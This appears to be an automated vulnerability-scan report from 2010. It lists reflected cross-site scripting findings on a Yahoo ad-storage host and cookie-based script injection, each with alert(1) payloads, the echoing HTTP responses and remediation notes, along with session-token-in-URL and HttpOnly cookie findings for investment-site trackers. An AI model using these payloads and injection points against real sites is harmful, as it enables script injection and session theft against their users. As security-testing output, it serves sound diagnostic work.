HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex73cb2<script>alert(1)</script>b637cd0aa47/mediastore/99a22469-f4ac-4f28-89af-1b875134b000?noredirect=1 x-ysws-request-id: 9370c02d-4444-4fff-ba66-391bdfca54e0 Date: Mon, 15 Nov 2010 02:47:08 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex73cb2<script>alert(1)</script>b637cd0aa47/mediastore/99a22469-f4ac-4f28-89af-1b875134b000</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9e10a<script>alert(1)</script>f4eb4f99327 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore9e10a<script>alert(1)</script>f4eb4f99327/99a22469-f4ac-4f28-89af-1b875134b000?noredirect=1 x-ysws-request-id: efc32eb2-d7aa-4253-98fb-0f1176bfc980 Date: Mon, 15 Nov 2010 02:47:08 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore9e10a<script>alert(1)</script>f4eb4f99327/99a22469-f4ac-4f28-89af-1b875134b000</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2050f<script>alert(1)</script>73af24b663c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore/99a22469-f4ac-4f28-89af-1b875134b0002050f<script>alert(1)</script>73af24b663c?noredirect=1 x-ysws-request-id: 8976102d-56d4-46e6-86b6-8f599206329c Date: Mon, 15 Nov 2010 02:47:09 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore/99a22469-f4ac-4f28-89af-1b875134b0002050f<script>alert(1)</script>73af24b663c</p>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 69d87<script>alert(1)</script>2a366561973 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex69d87<script>alert(1)</script>2a366561973/mediastore/a41b7019-ffe4-4441-82ec-999ddc10ec64?noredirect=1 x-ysws-request-id: 79b462be-4226-4b13-a824-1f997cf1c875 Date: Mon, 15 Nov 2010 02:47:11 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex69d87<script>alert(1)</script>2a366561973/mediastore/a41b7019-ffe4-4441-82ec-999ddc10ec64</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48540<script>alert(1)</script>217c78c52fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore48540<script>alert(1)</script>217c78c52fb/a41b7019-ffe4-4441-82ec-999ddc10ec64?noredirect=1 x-ysws-request-id: 73a4e556-858c-42f8-807e-e0d15a7f3858 Date: Mon, 15 Nov 2010 02:47:11 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore48540<script>alert(1)</script>217c78c52fb/a41b7019-ffe4-4441-82ec-999ddc10ec64</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c108c<script>alert(1)</script>570b7354d5e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore/a41b7019-ffe4-4441-82ec-999ddc10ec64c108c<script>alert(1)</script>570b7354d5e?noredirect=1 x-ysws-request-id: c6c3466b-8aee-4a98-bae2-9a94957d35c4 Date: Mon, 15 Nov 2010 02:47:12 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore/a41b7019-ffe4-4441-82ec-999ddc10ec64c108c<script>alert(1)</script>570b7354d5e</p>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a75c4<script>alert(1)</script>3236a6f7778 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apexa75c4<script>alert(1)</script>3236a6f7778/mediastore/c3d92b61-4f57-4cda-87bb-1d308db151c3?noredirect=1 x-ysws-request-id: 80bbecdc-07c5-4be0-aa30-20e086f932a3 Date: Mon, 15 Nov 2010 02:47:08 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apexa75c4<script>alert(1)</script>3236a6f7778/mediastore/c3d92b61-4f57-4cda-87bb-1d308db151c3</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2dd3f<script>alert(1)</script>c25bad628d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore2dd3f<script>alert(1)</script>c25bad628d9/c3d92b61-4f57-4cda-87bb-1d308db151c3?noredirect=1 x-ysws-request-id: ce3eed25-f0e5-4337-a483-ffcea5f1e897 Date: Mon, 15 Nov 2010 02:47:08 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore2dd3f<script>alert(1)</script>c25bad628d9/c3d92b61-4f57-4cda-87bb-1d308db151c3</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4889c<script>alert(1)</script>bd01896ef8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore/c3d92b61-4f57-4cda-87bb-1d308db151c34889c<script>alert(1)</script>bd01896ef8d?noredirect=1 x-ysws-request-id: 7966be1f-402f-4475-9f86-2a5bf34a992c Date: Mon, 15 Nov 2010 02:47:09 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore/c3d92b61-4f57-4cda-87bb-1d308db151c34889c<script>alert(1)</script>bd01896ef8d</p>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 35f66<script>alert(1)</script>03feef5848f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex35f66<script>alert(1)</script>03feef5848f/mediastore/e2331a53-6c4d-4d4a-a1a0-3e7325e9fea7?noredirect=1 x-ysws-request-id: 4b4db4f0-cc16-4c67-89cb-083a5f6f659b Date: Mon, 15 Nov 2010 02:47:08 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex35f66<script>alert(1)</script>03feef5848f/mediastore/e2331a53-6c4d-4d4a-a1a0-3e7325e9fea7</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8e3c6<script>alert(1)</script>6664911f33e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore8e3c6<script>alert(1)</script>6664911f33e/e2331a53-6c4d-4d4a-a1a0-3e7325e9fea7?noredirect=1 x-ysws-request-id: c0d5e7c2-744b-4626-b294-d6921b23f0f4 Date: Mon, 15 Nov 2010 02:47:08 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore8e3c6<script>alert(1)</script>6664911f33e/e2331a53-6c4d-4d4a-a1a0-3e7325e9fea7</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f9155<script>alert(1)</script>deb24b2d7e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore/e2331a53-6c4d-4d4a-a1a0-3e7325e9fea7f9155<script>alert(1)</script>deb24b2d7e1?noredirect=1 x-ysws-request-id: 6ea46e1c-4f8d-4752-a991-02fdad921114 Date: Mon, 15 Nov 2010 02:47:09 GMT Connection: close Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore/e2331a53-6c4d-4d4a-a1a0-3e7325e9fea7f9155<script>alert(1)</script>deb24b2d7e1</p>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload adf32<script>alert(1)</script>faf1cec383c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apexadf32<script>alert(1)</script>faf1cec383c/template/swfobject.js?noredirect=1 x-ysws-request-id: 30bec40f-c3e5-4dac-9147-d4ac008b1e89 Date: Sun, 14 Nov 2010 23:03:19 GMT Connection: close Content-Length: 144
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apexadf32<script>alert(1)</script>faf1cec383c/template/swfobject.js</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f7bd9<script>alert(1)</script>184d12aba62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/templatef7bd9<script>alert(1)</script>184d12aba62/swfobject.js?noredirect=1 x-ysws-request-id: af0206e1-96cf-4726-84da-c38a55d749c2 Date: Sun, 14 Nov 2010 23:03:26 GMT Connection: close Content-Length: 144
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/templatef7bd9<script>alert(1)</script>184d12aba62/swfobject.js</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 84b03<script>alert(1)</script>bbf8e977d32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" x-ysws-error-detail: not_in_objectstore Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Server: YTS/1.17.23.1 Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/template/swfobject.js84b03<script>alert(1)</script>bbf8e977d32?noredirect=1 x-ysws-request-id: b3fd4a8e-6a6a-48fd-802f-cd012299c0ec Date: Sun, 14 Nov 2010 23:03:32 GMT Connection: close Content-Length: 144
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/template/swfobject.js84b03<script>alert(1)</script>bbf8e977d32</p>
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3d55"-alert(1)-"44ea32a63f7 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e084"-alert(1)-"4983a1bcc5f was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7158"-alert(1)-"c2fb6388161 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f826"-alert(1)-"e1bc5f2c148 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the bev cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fac0</script><script>alert(1)</script>41e5e875679 was submitted in the bev cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbm ...[SNIP]... s = "We suggest unchecking a couple filters, zooming out, or searching for a different city.";
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
Request
GET /m2/fisherinvestments/mbox/standard?mboxHost=www.fi.com&mboxSession=1289795137202-209168&mboxPage=1289795137202-209168&screenHeight=1200&screenWidth=1920&browserWidth=1525&browserHeight=904&browserTimeOffset=-360&colorDepth=16&mboxCount=1&mbox=FI_Home_Page&mboxId=0&mboxTime=1289773537206&mboxURL=http%3A%2F%2Fwww.fi.com%2F&mboxReferrer=http%3A%2F%2Ffi.com%2F&mboxVersion=39 HTTP/1.1 Host: fisherinvestments.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.fi.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 167 Date: Mon, 15 Nov 2010 04:27:08 GMT Server: Test & Target
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>StoreGrid Professional Edition Pricing | Vembu StoreGrid | Remote Backup Sof ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi=[CS]v1|26705B4E85010E89-400001068000283F[CE]; Expires=Sat, 14 Nov 2015 04:27:09 GMT; Domain=fisherinvestments.112.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/finvfisherinvestmentscom/1/H.7-pdv-2/s58622881630435?[AQB]&ndh=1&t=14/10/2010%2022%3A25%3A38%200%20360&ns=fisherinvestments&pageName=Home&g=http%3A//www.fi.com/&r=http%3A//fi.com/&cc=USD&ch=Home&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1525&bh=904&p=Google%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.210.7%3BJava%28TM%29%20Platform%20SE%206%20U21%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1 Host: fisherinvestments.112.2o7.net Proxy-Connection: keep-alive Referer: http://www.fi.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_x60x7Dyqx60fubqxxuzpxxqx7Dgafq=[CS]v4|26592C6C851D182D-40000105803C8570|4CB258D7[CE]; s_vi_lojlx7Bdx7Enbx60chz=[CS]v4|266BA10085012300-40000108C0005B7D|4CD74200[CE]; s_vi_iixxmhx7Fnmox7E=[CS]v4|266BA12D05010B60-60000102C0001E38|4CD74259[CE]; s_vi_bx7Bhx7Fx7Eybnfx23nbx60=[CS]v4|266D5F9B85011F45-60000114C0008F4A|4CDABF35[CE]; s_vi_kjodgjid=[CS]v4|2670313405010FB8-6000011760028933|4CE06266[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26704C3805013F28-400001076003F251|4CE0986E[CE]
Response
